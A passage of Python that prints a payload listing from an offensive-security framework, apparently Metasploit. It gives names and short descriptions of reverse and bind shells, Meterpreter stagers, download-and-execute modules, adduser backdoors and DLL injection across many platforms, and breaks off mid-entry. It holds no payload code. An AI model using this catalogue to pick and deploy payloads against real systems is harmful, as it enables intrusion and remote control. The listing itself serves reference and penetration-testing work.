print("""\x1b[1m\x1b[33mFramework Payloads (592 total)\x1b[37m\n\x1b[33m==================================================\x1b[37m\n\n\x1b[33mName\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m----\x1b[37m \x1b[33m-----------\x1b[37m\naix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell\naix/ppc/shell_find_port Spawn a shell on an established connection\naix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)\naix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell\nandroid/meterpreter/reverse_http Run a meterpreter server in Android. Tunnel communication over HTTP\nandroid/meterpreter/reverse_https Run a meterpreter server in Android. Tunnel communication over HTTPS\nandroid/meterpreter/reverse_tcp Run a meterpreter server in Android. Connect back stager\nandroid/meterpreter_reverse_http Connect back to attacker and spawn a Meterpreter shell\nandroid/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter shell\nandroid/meterpreter_reverse_tcp Connect back to the attacker and spawn a Meterpreter shell\nandroid/shell/reverse_http Spawn a piped command shell (sh). Tunnel communication over HTTP\nandroid/shell/reverse_https Spawn a piped command shell (sh). Tunnel communication over HTTPS\nandroid/shell/reverse_tcp Spawn a piped command shell (sh). Connect back stager\napple_ios/aarch64/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\napple_ios/aarch64/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\napple_ios/aarch64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\napple_ios/aarch64/shell_reverse_tcp Connect back to attacker and spawn a command shell\napple_ios/armle/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\napple_ios/armle/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\napple_ios/armle/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nbsd/sparc/shell_bind_tcp Listen for a connection and spawn a command shell\nbsd/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell\nbsd/vax/shell_reverse_tcp Connect back to attacker and spawn a command shell\nbsd/x64/exec Execute an arbitrary command\nbsd/x64/shell_bind_ipv6_tcp Listen for a connection and spawn a command shell over IPv6\nbsd/x64/shell_bind_tcp Bind an arbitrary command to an arbitrary port\nbsd/x64/shell_bind_tcp_small Listen for a connection and spawn a command shell\nbsd/x64/shell_reverse_ipv6_tcp Connect back to attacker and spawn a command shell over IPv6\nbsd/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell\nbsd/x64/shell_reverse_tcp_small Connect back to attacker and spawn a command shell\nbsd/x86/exec Execute an arbitrary command\nbsd/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service\nbsd/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service\nbsd/x86/shell/bind_ipv6_tcp Spawn a command shell (staged). Listen for a connection over IPv6\nbsd/x86/shell/bind_tcp Spawn a command shell (staged). Listen for a connection\nbsd/x86/shell/find_tag Spawn a command shell (staged). Use an established connection\nbsd/x86/shell/reverse_ipv6_tcp Spawn a command shell (staged). Connect back to the attacker over IPv6\nbsd/x86/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nbsd/x86/shell_bind_tcp Listen for a connection and spawn a command shell\nbsd/x86/shell_bind_tcp_ipv6 Listen for a connection and spawn a command shell over IPv6\nbsd/x86/shell_find_port Spawn a shell on an established connection\nbsd/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)\nbsd/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell\nbsd/x86/shell_reverse_tcp_ipv6 Connect back to attacker and spawn a command shell over IPv6\nbsdi/x86/shell/bind_tcp Spawn a command shell (staged). Listen for a connection\nbsdi/x86/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nbsdi/x86/shell_bind_tcp Listen for a connection and spawn a command shell\nbsdi/x86/shell_find_port Spawn a shell on an established connection\nbsdi/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell\ncmd/mainframe/apf_privesc_jcl (Elevate privileges for user. Adds SYSTEM SPECIAL and BPX.SUPERUSER to user profile. Does this by using an unsecured/updateable APF authorized library (APFLIB) and updating the user's ACEE using this program/library. Note: This privesc only works with z/OS systems using RACF, no other ESM is supported.)\ncmd/mainframe/bind_shell_jcl Provide JCL which creates a bind shell This implmentation does not include ebcdic character translation, so a client with translation capabilities is required. MSF handles this automatically.\ncmd/mainframe/generic_jcl Provide JCL which can be used to submit a job to JES2 on z/OS which will exit and return 0. This can be used as a template for other JCL based payloads\ncmd/mainframe/reverse_shell_jcl Provide JCL which creates a reverse shell This implementation does not include ebcdic character translation, so a client with translation capabilities is required. MSF handles this automatically.\ncmd/unix/bind_awk Listen for a connection and spawn a command shell via GNU AWKcmd/unix/bind_busybox_telnetd Listen for a connection and spawn a command shell via BusyBox telnetdcmd/unix/bind_inetd Listen for a connection and spawn a command shell (persistent)cmd/unix/bind_jjs Listen for a connection and spawn a command shell via jjs\ncmd/unix/bind_lua Listen for a connection and spawn a command shell via Lua\ncmd/unix/bind_netcat Listen for a connection and spawn a command shell via netcat\ncmd/unix/bind_netcat_gaping Listen for a connection and spawn a command shell via netcat\ncmd/unix/bind_netcat_gaping_ipv6 Listen for a connection and spawn a command shell via netcat\ncmd/unix/bind_nodejs Continually listen for a connection and spawn a command shell via nodejs\ncmd/unix/bind_perl Listen for a connection and spawn a command shell via perl\ncmd/unix/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl\ncmd/unix/bind_r Continually listen for a connection and spawn a command shell via R\ncmd/unix/bind_ruby Continually listen for a connection and spawn a command shell via Ruby\ncmd/unix/bind_ruby_ipv6 Continually listen for a connection and spawn a command shell via Ruby\ncmd/unix/bind_socat_udp Creates an interactive shell via socat\ncmd/unix/bind_stub Listen for a connection and spawn a command shell (stub only, no payload)\ncmd/unix/bind_zsh Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is often available, please be aware it isn't usually installed by default.\ncmd/unix/generic Executes the supplied command\ncmd/unix/interact Interacts with a shell on an established socket connection\ncmd/unix/pingback_bind Accept a connection, send a UUID, then exit\ncmd/unix/pingback_reverse Creates a socket, send a UUID, then exit\ncmd/unix/reverse Creates an interactive shell through two inbound connections\ncmd/unix/reverse_awk Creates an interactive shell via GNU AWK\ncmd/unix/reverse_bash Creates an interactive shell via bash's builtin /dev/tcp. This will not work on circa 2009 and older Debian-based Linux distributions (including Ubuntu) because they compile bashwithout the /dev/tcp feature.\ncmd/unix/reverse_bash_telnet_ssl Creates an interactive shell via mkfifo and telnet. This method works on Debian and other systems compiled without /dev/tcp support. This module uses the '-z' option included on some systems to encrypt using SSL.\ncmd/unix/reverse_bash_udp Creates an interactive shell via bash's builtin /dev/udp. This will not work on circa 2009 and older Debian-based Linux distributions (including Ubuntu) because they compile bashwithout the /dev/udp feature.\ncmd/unix/reverse_jjs Connect back and create a command shell via jjs\ncmd/unix/reverse_ksh Connect back and create a command shell via Ksh. Note: Although Ksh is often available, please be aware it isn't usually installed by default.\ncmd/unix/reverse_lua Creates an interactive shell via Lua\ncmd/unix/reverse_ncat_ssl Creates an interactive shell via ncat, utilizing ssl mode\ncmd/unix/reverse_netcat Creates an interactive shell via netcat\ncmd/unix/reverse_netcat_gaping Creates an interactive shell via netcat\ncmd/unix/reverse_nodejs Continually listen for a connection and spawn a command shell via nodejs\ncmd/unix/reverse_openssl Creates an interactive shell through two inbound connections\ncmd/unix/reverse_perl Creates an interactive shell via perl\ncmd/unix/reverse_perl_ssl Creates an interactive shell via perl, uses SSL\ncmd/unix/reverse_php_ssl Creates an interactive shell via php, uses SSL\ncmd/unix/reverse_python Connect back and create a command shell via Python\ncmd/unix/reverse_python_ssl Creates an interactive shell via python, uses SSL, encodes with base64 by design.\ncmd/unix/reverse_r Connect back and create a command shell via R\ncmd/unix/reverse_ruby Connect back and create a command shell via Ruby\ncmd/unix/reverse_ruby_ssl Connect back and create a command shell via Ruby, uses SSL\ncmd/unix/reverse_socat_udp Creates an interactive shell via socat\ncmd/unix/reverse_ssh Connect back and create a command shell via SSH\ncmd/unix/reverse_ssl_double_telnet Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option\ncmd/unix/reverse_stub Creates an interactive shell through an inbound connection (stub only, no payload)\ncmd/unix/reverse_tclsh Creates an interactive shell via Tclsh\ncmd/unix/reverse_zsh Connect back and create a command shell via Zsh. Note: Although Zsh is often available, please be aware it isn't usually installed by default.\ncmd/windows/adduser Create a new user and add them to local administration group. Note: The specified password is checked for common complexity requirements to prevent the target machine rejecting the user for failing to meet policy requirements. Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)\ncmd/windows/bind_lua Listen for a connection and spawn a command shell via Lua\ncmd/windows/bind_perl Listen for a connection and spawn a command shell via perl (persistent)\ncmd/windows/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl (persistent)\ncmd/windows/bind_ruby Continually listen for a connection and spawn a command shell via Ruby\ncmd/windows/download_eval_vbs Downloads a file from an HTTP(S) URL and executes it as a vbs script. Use it to stage a vbs encoded payload from a short command line.\ncmd/windows/download_exec_vbs Download an EXE from an HTTP(S) URL and execute it\ncmd/windows/generic Executes the supplied command\ncmd/windows/powershell_bind_tcp Interacts with a powershell session on an established socket connection\ncmd/windows/powershell_reverse_tcp Interacts with a powershell session on an established socket connection\ncmd/windows/reverse_lua Creates an interactive shell via Lua\ncmd/windows/reverse_perl Creates an interactive shell via perl\ncmd/windows/reverse_powershell Connect back and create a command shell via Powershell\ncmd/windows/reverse_ruby Connect back and create a command shell via Ruby\nfirefox/exec This module runs a shell command on the target OS without touching the disk. On Windows, this command will flash the command prompt momentarily. This can be avoided by setting WSCRIPT to true, which drops a jscript "launcher" to disk that hides the prompt.\nfirefox/shell_bind_tcp Creates an interactive shell via Javascript with access to Firefox's XPCOM API\nfirefox/shell_reverse_tcp Creates an interactive shell via Javascript with access to Firefox's XPCOM API\ngeneric/custom Use custom string or file as payload. Set either PAYLOADFILE or PAYLOADSTR.\ngeneric/debug_trap Generate a debug trap in the target process\ngeneric/shell_bind_tcp Listen for a connection and spawn a command shell\ngeneric/shell_reverse_tcp Connect back to attacker and spawn a command shell\ngeneric/tight_loop Generate a tight loop in the target process\njava/jsp_shell_bind_tcp Listen for a connection and spawn a command shell\njava/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell\njava/meterpreter/bind_tcp Run a meterpreter server in Java. Listen for a connection\njava/meterpreter/reverse_http Run a meterpreter server in Java. Tunnel communication over HTTP\njava/meterpreter/reverse_https Run a meterpreter server in Java. Tunnel communication over HTTPS\njava/meterpreter/reverse_tcp Run a meterpreter server in Java. Connect back stager\njava/shell/bind_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Listen for a connection\njava/shell/reverse_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager\njava/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/aarch64/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker\nlinux/aarch64/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/aarch64/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/aarch64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/aarch64/shell/reverse_tcp dup2 socket in x12, then execve. Connect back to the attacker\nlinux/aarch64/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/armbe/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/armbe/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/armbe/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/armbe/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/armle/adduser Create a new user with UID 0\nlinux/armle/exec Execute an arbitrary command\nlinux/armle/meterpreter/bind_tcp Inject the mettle server payload (staged). Listen for a connection\nlinux/armle/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker\nlinux/armle/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/armle/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/armle/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/armle/shell/bind_tcp dup2 socket in r12, then execve. Listen for a connection\nlinux/armle/shell/reverse_tcp dup2 socket in r12, then execve. Connect back to the attacker\nlinux/armle/shell_bind_tcp Connect to target and spawn a command shell\nlinux/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/mips64/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/mips64/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/mips64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsbe/exec A very small shellcode for executing commands. This module is sometimes helpful for testing purposes.\nlinux/mipsbe/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker\nlinux/mipsbe/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsbe/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsbe/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsbe/reboot A very small shellcode for rebooting the system. This payload is sometimes helpful for testing purposes or executing other payloads that rely on initial startup procedures.\nlinux/mipsbe/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nlinux/mipsbe/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/mipsbe/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/mipsle/exec A very small shellcode for executing commands. This module is sometimes helpful for testing purposes as well as on targets with extremely limited buffer space.\nlinux/mipsle/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker\nlinux/mipsle/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsle/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsle/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsle/reboot A very small shellcode for rebooting the system. This payload is sometimes helpful for testing purposes.\nlinux/mipsle/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nlinux/mipsle/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/mipsle/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/ppc/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppc/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppc/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppc/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/ppc/shell_find_port Spawn a shell on an established connection\nlinux/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/ppc64/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/ppc64/shell_find_port Spawn a shell on an established connection\nlinux/ppc64/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/ppc64le/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppc64le/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppc64le/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppce500v2/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppce500v2/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppce500v2/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/x64/exec Execute an arbitrary command or just a /bin/sh shell\nlinux/x64/meterpreter/bind_tcp Inject the mettle server payload (staged). Listen for a connection\nlinux/x64/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker\nlinux/x64/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/x64/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/x64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/x64/pingback_bind_tcp Accept a connection from attacker and report UUID (Linux x64)\nlinux/x64/pingback_reverse_tcp Connect back to attacker and report UUID (Linux x64)\nlinux/x64/shell/bind_tcp Spawn a command shell (staged). Listen for a connection\nlinux/x64/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nlinux/x64/shell_bind_ipv6_tcp Listen for an IPv6 connection and spawn a command shell\nlinux/x64/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/x64/shell_bind_tcp_random_port Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: 'nmap -sS target -p-'.\nlinux/x64/shell_find_port Spawn a shell on an established connection\nlinux/x64/shell_reverse_ipv6_tcp Connect back to attacker and spawn a command shell over IPv6\nlinux/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/x86/adduser Create a new user with UID 0\nlinux/x86/chmod Runs chmod on specified file with specified mode\nlinux/x86/exec Execute an arbitrary command or just a /bin/sh shell\nlinux/x86/meterpreter/bind_ipv6_tcp Inject the mettle server payload (staged). Listen for an IPv6 connection (Linux x86)\nlinux/x86/meterpreter/bind_ipv6_tcp_uuid Inject the mettle server payload (staged). Listen for an IPv6 connection with UUID Support (Linux x86)\nlinux/x86/meterpreter/bind_nonx_tcp Inject the mettle server payload (staged). Listen for a connection\nlinux/x86/meterpreter/bind_tcp Inject the mettle server payload (staged). Listen for a connection (Linux x86)\nlinux/x86/meterpreter/bind_tcp_uuid Inject the mettle server payload (staged). Listen for a connection with UUID Support (Linux x86)\nlinux/x86/meterpreter/find_tag Inject the mettle server payload (staged). Use an established connection\nlinux/x86/meterpreter/reverse_ipv6_tcp Inject the mettle server payload (staged). Connect back to attacker over IPv6\nlinux/x86/meterpreter/reverse_nonx_tcp Inject the mettle server payload (staged). Connect back to the attacker\nlinux/x86/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker\nlinux/x86/meterpreter/reverse_tcp_uuid Inject the mettle server payload (staged). Connect back to the attacker\nlinux/x86/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/x86/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/x86/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service\nlinux/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service\nlinux/x86/read_file Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor\nlinux/x86/shell/bind_ipv6_tcp Spawn a command shell (staged). Listen for an IPv6 connection (Linux x86)\nlinux/x86/shell/bind_ipv6_tcp_uuid Spawn a command shell (staged). Listen for an IPv6 connection with UUID Support (Linux x86)\nlinux/x86/shell/bind_nonx_tcp Spawn a command shell (staged). Listen for a connection\nlinux/x86/shell/bind_tcp Spawn a command shell (staged). Listen for a connection (Linux x86)\nlinux/x86/shell/bind_tcp_uuid Spawn a command shell (staged). Listen for a connection with UUID Support (Linux x86)\nlinux/x86/shell/find_tag Spawn a command shell (staged). Use an established connection\nlinux/x86/shell/reverse_ipv6_tcp Spawn a command shell (staged). Connect back to attacker over IPv6\nlinux/x86/shell/reverse_nonx_tcp Spawn a command shell (staged). Connect back to the attacker\nlinux/x86/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nlinux/x86/shell/reverse_tcp_uuid Spawn a command shell (staged). Connect back to the attacker\nlinux/x86/shell_bind_ipv6_tcp Listen for a connection over IPv6 and spawn a command shell\nlinux/x86/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/x86/shell_bind_tcp_random_port Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: 'nmap -sS target -p-'.\nlinux/x86/shell_find_port Spawn a shell on an established connection\nlinux/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)\nlinux/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/x86/shell_reverse_tcp_ipv6 Connect back to attacker and spawn a command shell over IPv6\nlinux/zarch/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/zarch/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/zarch/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nmainframe/shell_reverse_tcp Listen for a connection and spawn a command shell. This implementation does not include ebcdic character translation, so a client with translation capabilities is required. MSF handles this automatically.\nmulti/meterpreter/reverse_http Handle Meterpreter sessions regardless of the target arch/platform. Tunnel communication over HTTP\nmulti/meterpreter/reverse_https Handle Meterpreter sessions regardless of the target arch/platform. Tunnel communication over HTTPS\nnetware/shell/reverse_tcp Connect to the NetWare console (staged). Connect back to the attacker\nnodejs/shell_bind_tcp Creates an interactive shell via nodejs\nnodejs/shell_reverse_tcp Creates an interactive shell via nodejs\nnodejs/shell_reverse_tcp_ssl Creates an interactive shell via nodejs, uses SSL\nosx/armle/execute/bind_tcp Spawn a command shell (staged). Listen for a connection\nosx/armle/execute/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nosx/armle/shell/bind_tcp Spawn a command shell (staged). Listen for a connection\nosx/armle/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nosx/armle/shell_bind_tcp Listen for a connection and spawn a command shell\nosx/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell\nosx/armle/vibrate Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded. Based on work by Charlie Miller <cmiller[at]securityevaluators.com>.\nosx/ppc/shell/bind_tcp Spawn a command shell (staged). Listen for a connection\nosx/ppc/shell/find_tag Spawn a command shell (staged). Use an established connection\nosx/ppc/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nosx/ppc/shell_bind_tcp Listen for a connection and spawn a command shell\nosx/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell\nosx/x64/dupandexecve/bind_tcp dup2 socket in edi, then execve. Listen, read length, read buffer, execute\nosx/x64/dupandexecve/reverse_tcp dup2 socket in edi, then execve. Connect, read length, read buffer, execute\nosx/x64/dupandexecve/reverse_tcp_uuid dup2 socket in edi, then execve. Connect back to the attacker with UUID Support (OSX x64)\nosx/x64/exec Execute an arbitrary command\nosx/x64/meterpreter/bind_tcp Inject the mettle server payload (staged). Listen, read length, read buffer, execute\nosx/x64/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect, read length, read buffer, execute\nosx/x64/meterpreter/reverse_tcp_uuid Inject the mettle server payload (staged). Connect back to the attacker with UUID Support (OSX x64)\nosx/x64/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nosx/x64/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nosx/x64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nosx/x64/say Say an arbitrary string outloud using Mac OS X text2speech\nosx/x64/shell_bind_tcp Bind an arbitrary command to an arbitrary port\nosx/x64/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)\nosx/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell\nosx/x86/bundleinject/bind_tcp Inject a custom Mach-O bundle into the exploited process. Listen, read length, read buffer, execute\nosx/x86/bundleinject/reverse_tcp Inject a custom Mach-O bundle into the exploited process. Connect, read length, read buffer, execute\nosx/x86/exec Execute an arbitrary command\nosx/x86/isight/bind_tcp Inject a Mach-O bundle to capture a photo from the iSight (staged). Listen, read length, read buffer, execute\nosx/x86/isight/reverse_tcp Inject a Mach-O bundle to capture a photo from the iSight (staged). Connect, read length, read buffer, execute\nosx/x86/shell_bind_tcp Listen for a connection and spawn a command shell\nosx/x86/shell_find_port Spawn a shell on an established connection\nosx/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell\nosx/x86/vforkshell/bind_tcp Call vfork() if necessary and spawn a command shell (staged). Listen, read length, read buffer, execute\nosx/x86/vforkshell/reverse_tcp Call vfork() if necessary and spawn a command shell (staged). Connect, read length, read buffer, execute\nosx/x86/vforkshell_bind_tcp Listen for a connection, vfork if necessary, and spawn a command shell\nosx/x86/vforkshell_reverse_tcp Connect back to attacker, vfork if necessary, and spawn a command shell\nphp/bind_perl Listen for a connection and spawn a command shell via perl (persistent)\nphp/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl (persistent) over IPv6\nphp/bind_php Listen for a connection and spawn a command shell via php\nphp/bind_php_ipv6 Listen for a connection and spawn a command shell via php (IPv6)\nphp/download_exec Download an EXE from an HTTP URL and execute it\nphp/exec Execute a single system command\nphp/meterpreter/bind_tcp Run a meterpreter server in PHP. Listen for a connection\nphp/meterpreter/bind_tcp_ipv6 Run a meterpreter server in PHP. Listen for a connection over IPv6\nphp/meterpreter/bind_tcp_ipv6_uuid Run a meterpreter server in PHP. Listen for a connection over IPv6 with UUID Support\nphp/meterpreter/bind_tcp_uuid Run a meterpreter server in PHP. Listen for a connection with UUID Support\nphp/meterpreter/reverse_tcp Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions\nphp/meterpreter/reverse_tcp_uuid Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions\nphp/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter server (PHP)\nphp/reverse_perl Creates an interactive shell via perl\nphp/reverse_php Reverse PHP connect back shell with checks for disabled functions\nphp/shell_findsock Spawn a shell on the established connection to the webserver. Unfortunately, this payload can leave conspicuous evil-looking entries in the apache error logs, so it is probably agood idea to use a bind or reverse shell unless firewalls prevent them from working. The issue this payload takes advantage of (CLOEXEC flag not set on sockets) appears to have been patched on the Ubuntu version of Apache and may not work on other Debian-based distributions. Only tested on Apache but it might work on other web servers that leak file descriptors to child processes.\npython/meterpreter/bind_tcp Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection\npython/meterpreter/bind_tcp_uuid Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection with UUID Support\npython/meterpreter/reverse_http Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP\npython/meterpreter/reverse_https Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP using SSL\npython/meterpreter/reverse_tcp Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker\npython/meterpreter/reverse_tcp_ssl Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Reverse Python connect back stager using SSL\npython/meterpreter/reverse_tcp_uuid Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker with UUID Support\npython/meterpreter_bind_tcp Connect to the victim and spawn a Meterpreter shell\npython/meterpreter_reverse_http Connect back to the attacker and spawn a Meterpreter shell\npython/meterpreter_reverse_https Connect back to the attacker and spawn a Meterpreter shell\npython/meterpreter_reverse_tcp Connect back to the attacker and spawn a Meterpreter shell\npython/pingback_bind_tcp Listens for a connection from the attacker, sends a UUID, then terminates\npython/pingback_reverse_tcp Connects back to the attacker, sends a UUID, then terminates\npython/shell_bind_tcp Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.\npython/shell_reverse_tcp Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.\npython/shell_reverse_tcp_ssl Creates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.\npython/shell_reverse_udp Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.\nr/shell_bind_tcp Continually listen for a connection and spawn a command shell via R\nr/shell_reverse_tcp Connect back and create a command shell via R\nruby/pingback_bind_tcp Listens for a connection from the attacker, sends a UUID, then terminates\nruby/pingback_reverse_tcp Connect back to the attacker, sends a UUID, then terminates\nruby/shell_bind_tcp Continually listen for a connection and spawn a command shell via Ruby\nruby/shell_bind_tcp_ipv6 Continually listen for a connection and spawn a command shell via Ruby\nruby/shell_reverse_tcp Connect back and create a command shell via Ruby\nruby/shell_reverse_tcp_ssl Connect back and create a command shell via Ruby, uses SSL\nsolaris/sparc/shell_bind_tcp Listen for a connection and spawn a command shell\nsolaris/sparc/shell_find_port Spawn a shell on an established connection\nsolaris/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell\nsolaris/x86/shell_bind_tcp Listen for a connection and spawn a command shell\nsolaris/x86/shell_find_port Spawn a shell on an established connection\nsolaris/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell\ntty/unix/interact Interacts with a TTY on an established socket connection\nwindows/adduser Create a new user and add them to local administration group. Note: The specified password is checked for common complexity requirements to prevent the target machine rejecting the user for failing to meet policy requirements. Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)\nwindows/dllinject/bind_hidden_ipknock_tcp Inject a DLL via a reflective loader. Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method(you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/dllinject/bind_hidden_tcp Inject a DLL via a reflective loader. Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/dllinject/bind_ipv6_tcp Inject a DLL via a reflective loader. Listen for an IPv6 connection (Windows x86)\nwindows/dllinject/bind_ipv6_tcp_uuid Inject a DLL via a reflective loader. Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/dllinject/bind_named_pipe Inject a DLL via a reflective loader. Listen for a pipe connection (Windows x86)\nwindows/dllinject/bind_nonx_tcp Inject a DLL via a reflective loader. Listen for a connection (No NX)\nwindows/dllinject/bind_tcp Inject a DLL via a reflective loader. Listen for a connection (Windows x86)\nwindows/dllinject/bind_tcp_rc4 Inject a DLL via a reflective loader. 